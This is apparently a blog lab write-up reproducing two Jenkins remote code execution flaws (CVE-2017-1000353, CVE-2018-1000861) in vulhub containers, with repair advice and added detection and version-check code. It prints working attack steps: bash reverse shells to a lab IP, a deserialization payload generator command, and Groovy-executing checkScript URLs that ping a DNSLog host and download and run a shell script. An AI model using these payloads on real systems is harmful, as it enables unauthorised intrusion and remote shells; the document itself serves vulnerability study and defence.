Jenkins RCE vulnerability reproduction (CVE-2017-1000353, CVE-2018-1000861)


1. Introduction

Jenkins is a continuous-build tool commonly used in the software testing process. Jenkins RCE vulnerabilities are triggered in roughly two ways: through the Jenkins CLI, or through an HTTP request. CVE-2017-1000353 and CVE-2018-1000861, reproduced here, are representative of these two triggering methods.

2. Introduction to Jenkins

Jenkins is a web-based tool widely used for continuous builds. It automates the compilation, packaging, distribution and deployment of projects: the steps that used to be done by hand (compile, package, upload, deploy to middleware such as Tomcat) are handed over to Jenkins, which pulls the code from the given repository address onto the Jenkins host, compiles and packages it, and publishes it to the web container. Jenkins supports multiple languages (Java, C#, PHP, etc.), is compatible with third-party build tools such as Ant, Maven and Gradle, integrates seamlessly with the mainstream version control tools Git and SVN, and supports direct integration with GitHub.

2.1 Jenkins CLI

Jenkins CLI is Jenkins' built-in command-line interface, which lets users and administrators access Jenkins from a script or shell environment. It is convenient for scripting routine tasks, and batch updates, troubleshooting and similar work are also easy to do with it.


3. Jenkins-CI remote code execution vulnerability (CVE-2017-1000353)

3.1 Vulnerability Overview

CVE-2017-1000353 is an unauthenticated remote code execution vulnerability in Jenkins. An attacker can send a serialized Java SignedObject to the Jenkins CLI for processing; the object wrapped inside it is deserialized through an ObjectInputStream as a Command object, which bypasses the blacklist-based protection mechanism and results in code execution.
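The SignedObject wrapper described above can be recognised on the wire from the Java serialization stream header. As an added example (not code from the original post or from vulhub), this Python parser reads the outermost class name of a serialization stream and flags request bodies to the CLI endpoint whose outer object is java.security.SignedObject; the sample bodies are constructed for the example.

```python
"""Recognise a Java serialization stream and read its outermost class name.

Added example, not part of the original post. Header layout is the standard
Java Object Serialization Stream Protocol: magic 0xACED, version 0x0005, then
TC_OBJECT (0x73), TC_CLASSDESC (0x72), a 2-byte big-endian length and the
class name in modified UTF-8.
"""
from typing import List, Optional

STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72
# The wrapper class the write-up names as the blacklist bypass.
WATCH_CLASSES = {"java.security.SignedObject"}


def outer_class_name(stream: bytes) -> Optional[str]:
    """Class name of the first object in a serialization stream, or None."""
    if not stream.startswith(STREAM_MAGIC) or len(stream) < 8:
        return None
    if stream[4] != TC_OBJECT or stream[5] != TC_CLASSDESC:
        return None  # TC_STRING, TC_REFERENCE, proxy descriptors: not handled here
    name_len = int.from_bytes(stream[6:8], "big")
    name = stream[8:8 + name_len]
    if len(name) != name_len:
        return None  # truncated stream
    return name.decode("utf-8", errors="replace")


def serialized_classes(body: bytes) -> List[str]:
    """Outer class of every serialization stream embedded anywhere in a request body."""
    found, start = [], 0
    while (idx := body.find(STREAM_MAGIC, start)) >= 0:
        name = outer_class_name(body[idx:])
        if name is not None:
            found.append(name)
        start = idx + len(STREAM_MAGIC)
    return found


def is_suspicious_cli_body(body: bytes) -> bool:
    """True if the body carries a serialized object whose outer class is watched."""
    return any(name in WATCH_CLASSES for name in serialized_classes(body))


def serialized_header(class_name: str) -> bytes:
    """Constructed sample: stream header plus class descriptor name only, no real object."""
    name = class_name.encode()
    return STREAM_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC]) + len(name).to_bytes(2, "big") + name

# Constructed sample bodies (not real captures): a benign argument list and a SignedObject wrapper.
BENIGN_BODY = b"POST /cli HTTP/1.1\r\n\r\n" + serialized_header("java.util.ArrayList") + b"\x00" * 8
SUSPECT_BODY = b"POST /cli HTTP/1.1\r\n\r\n" + serialized_header("java.security.SignedObject") + b"\x00" * 8
```

A real CLI exchange nests several streams, so serialized_classes scans the whole body rather than only its start.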

Affected versions:

Jenkins version <= 2.56

Jenkins LTS version <= 2.46.1
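As an added example (not from the original post), a small check that classifies a Jenkins version string against the affected ranges listed above for CVE-2017-1000353. LTS releases carry three components (2.46.1) and weekly releases two (2.56), so the two lines are compared separately: LTS 2.46.2 is numerically below 2.56 but is a fixed release. The X-Jenkins response header an instance returns is one source for the version string; the thresholds are parameters so the same check can be reused for other advisories.

```python
"""Check a Jenkins version string against the affected ranges for CVE-2017-1000353.

Added example, not part of the original post. The thresholds are the ones
stated in the write-up: weekly releases <= 2.56, LTS releases <= 2.46.1.
"""
from typing import Tuple

WEEKLY_MAX = "2.56"   # last affected weekly release (from the write-up)
LTS_MAX = "2.46.1"    # last affected LTS release (from the write-up)


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '2.46.1' into (2, 46, 1); rejects anything that is not dotted integers."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a Jenkins version string: {text!r}")
    return tuple(int(p) for p in parts)


def is_lts(version: Tuple[int, ...]) -> bool:
    """Jenkins LTS versions have three components (2.46.1); weekly builds have two (2.56)."""
    return len(version) == 3


def is_affected(text: str, weekly_max: str = WEEKLY_MAX, lts_max: str = LTS_MAX) -> bool:
    """True if the version lies within the affected range of its own release line.

    Weekly and LTS lines are compared separately: LTS 2.46.2 is numerically
    below weekly 2.56 but is a fixed release, so one comparison would misclassify it.
    """
    version = parse_version(text)
    ceiling = parse_version(lts_max if is_lts(version) else weekly_max)
    return version <= ceiling


def check_header(x_jenkins: str) -> str:
    """Classify the value of the X-Jenkins response header an instance returns."""
    try:
        affected = is_affected(x_jenkins)
    except ValueError:
        return "unknown"
    return "affected" if affected else "not affected"


if __name__ == "__main__":
    for v in ("2.46.1", "2.46.2", "2.56", "2.57", "2.138"):
        print(v, check_header(v))
```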

3.2 Vulnerability reproduction

3.2.1 Vulnerability environment

Attack machine: kali (ip: 192.168.219.134)

Attacked host: docker environment deployment (ip: 192.168.219.128)

Vulnerability environment: vulhub/jenkins:2.46.1

Building process:

1. Download the vulhub lab environment (https://github.com/vulhub/vulhub).

2. After extracting it, switch to the specified directory and use docker-compose to pull the image and create the container.

cd vulhub-master/jenkins/CVE-2017-1000353
docker-compose up -d

3. Open TCP port 8080 on the firewall, and then access port 8080 to check whether the deployment is successful.

3.2.2 Reproduction process

Exploit tools:

CVE-2017-1000353-SNAPSHOT-all.jar (https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar)

exploit.py (https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py)

Reproduction steps:

  1. Use CVE-2017-1000353-SNAPSHOT-all.jar to generate the serialized payload file jenkins_poc.ser that executes the reverse shell command.

    # Use bash to open a reverse shell to port 4444 on the attack machine.
    bash -i >& /dev/tcp/192.168.219.134/4444 0>&1
    # Base64-encode the reverse shell command above; the result is:
    # YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxOS4xMzQvNDQ0NCAwPiYx
    # Use bash -c to run the encoded command.
    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxOS4xMzQvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}

    The final command to generate the ser file is as follows:

    java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxOS4xMzQvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"
    

    Note: if the Java version is too new, running the jar may produce errors; JDK 1.8 is recommended for this step.

  2. Use nc -lvp 4444 on kali to listen on port 4444.

  3. Use exploit.py to send jenkins_poc.ser to Jenkins.

    python exploit.py http://192.168.219.128:8080 jenkins_poc.ser
    


  4. The exploit succeeds and the reverse shell connects back.

3.3 Repair suggestions
  1. Upgrade Jenkins to the latest version or apply the relevant patches.
  2. Do not expose the Jenkins service to the public internet, or restrict access to specific IP addresses.

4. Jenkins remote command execution vulnerability (CVE-2018-1000861)

4.1 Vulnerability Overview

Jenkins is built on the Stapler web framework, which maps URL path segments to public methods on Java objects. Because this routing is not restricted, an attacker can construct special paths that reach sensitive Java methods.

Affected versions:

Jenkins version <= 2.56

Jenkins LTS version <= 2.46.1

4.2 Vulnerability reproduction

4.2.1 Vulnerability environment

Attack machine: kali (ip: 192.168.219.134)

Attacked host: docker environment deployment (ip: 192.168.219.128)

Vulnerability environment: vulhub/jenkins:2.138

Building process:

1. Download the vulhub lab environment (https://github.com/vulhub/vulhub).

2. After extracting it, switch to the specified directory and use docker-compose to pull the image and create the container.

cd vulhub-master/jenkins/CVE-2018-1000861
docker-compose up -d

3. Open TCP port 8080 on the firewall, and then access port 8080 to check whether the deployment is successful.

4.2.2 Reproduction process
  1. Request a DNSLog subdomain (http://www.dnslog.cn/), for example ma3b93.dnslog.cn.

  2. Use the POC to run a curl command that accesses the subdomain above.

    The curl command is as follows:

    curl http://ma3b93.dnslog.cn/
    

    The final POC is as follows:

    http://192.168.219.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl http://ma3b93.dnslog.cn/".execute()}}
    

    Adjust it to match the reproduction environment, then open the URL above in a browser.

  3. Check the DNS query records in DNSLog. If a matching record appears, this Jenkins instance is vulnerable and the curl command was executed.

  4. Use a downloaded script to obtain a reverse shell.

    • Create shell.sh on kali with the following content:

    bash -i >& /dev/tcp/192.168.219.134/4444 0>&1

    • In the directory containing shell.sh, run "python -m SimpleHTTPServer" to start an HTTP server.

    • Use the following POC to run a curl command that downloads shell.sh from kali and saves it as 1.sh under /tmp:

    http://192.168.219.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl -o /tmp/1.sh http://192.168.219.134:8000/shell.sh".execute()}}

    • Use nc -lvp 4444 on kali to listen on port 4444.

    • Use the following POC to execute 1.sh under /tmp:

    http://192.168.219.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"bash /tmp/1.sh".execute()}}

  5. The exploit succeeds and the reverse shell connects back.

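The POC URLs in 4.2.2 all pass through the same Stapler route, which makes them easy to pick out of the web server's access log. As an added example (not part of the original post), this Python detector flags lines that reach descriptorByName/.../checkScript, raises the severity when the value parameter contains a Groovy .execute() call, and notes when the request arrived through the securityRealm/user/<name>/ prefix; the NCSA-style log format and the sample lines are assumptions constructed for the example.

```python
"""Flag Jenkins access-log lines that reach the Stapler checkScript route used above.

Added example, not part of the original post. Assumes NCSA-style lines; the
sample lines at the bottom are constructed for this example.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Route fragments taken from the write-up's POC URL.
CHECKSCRIPT_RE = re.compile(r"/descriptorByName/[^/]+/checkScript$")
USER_PREFIX_RE = re.compile(r"^/securityRealm/user/[^/]+/")
EXEC_MARKER = ".execute("  # Groovy string-to-process call used in the write-up's payloads


def analyse_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one log line, or None if it is benign or unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not CHECKSCRIPT_RE.search(url.path):
        return None
    value = parse_qs(url.query).get("value", [""])[0]  # parse_qs percent-decodes
    finding = {"client": m.group("client"), "status": m.group("status"),
               "path": url.path, "severity": "medium",
               "reason": "checkScript reached via descriptorByName"}
    if USER_PREFIX_RE.match(url.path):
        finding["reason"] += " through the securityRealm/user/<name>/ prefix"
    if EXEC_MARKER in value:
        finding["severity"] = "high"
        finding["reason"] = "Groovy .execute() call in checkScript value"
        finding["value"] = value
    return finding


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run analyse_line over a whole log and keep only the findings."""
    return [f for f in map(analyse_line, lines) if f is not None]


SAMPLE_LOG = [  # constructed, not a real capture
    '192.168.219.134 - - [30/Dec/2022:17:50:14 +0800] "GET /job/test/lastBuild/ HTTP/1.1" 200 5120',
    '192.168.219.134 - - [30/Dec/2022:17:50:20 +0800] "GET /securityRealm/user/admin/descriptorByName/'
    'org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'
    '?sandbox=true&value=public%20class%20x%20%7Bpublic%20x()%7B%22id%22.execute()%7D%7D HTTP/1.1" 200 0',
    '192.168.219.134 - - [30/Dec/2022:17:50:31 +0800] "GET /descriptorByName/'
    'org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?value=1 HTTP/1.1" 403 0',
]
```

A 200 on the high-severity line is the signal to act on; the 403 on the last sample shows what a patched or access-restricted instance returns for the same route.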
4.3 Repair suggestions
  1. Upgrade Jenkins to the latest version or apply the relevant patches.
  2. Do not expose the Jenkins service to the public internet, or restrict access to specific IP addresses.

Source: blog.csdn.net/oiadkt/article/details/130318175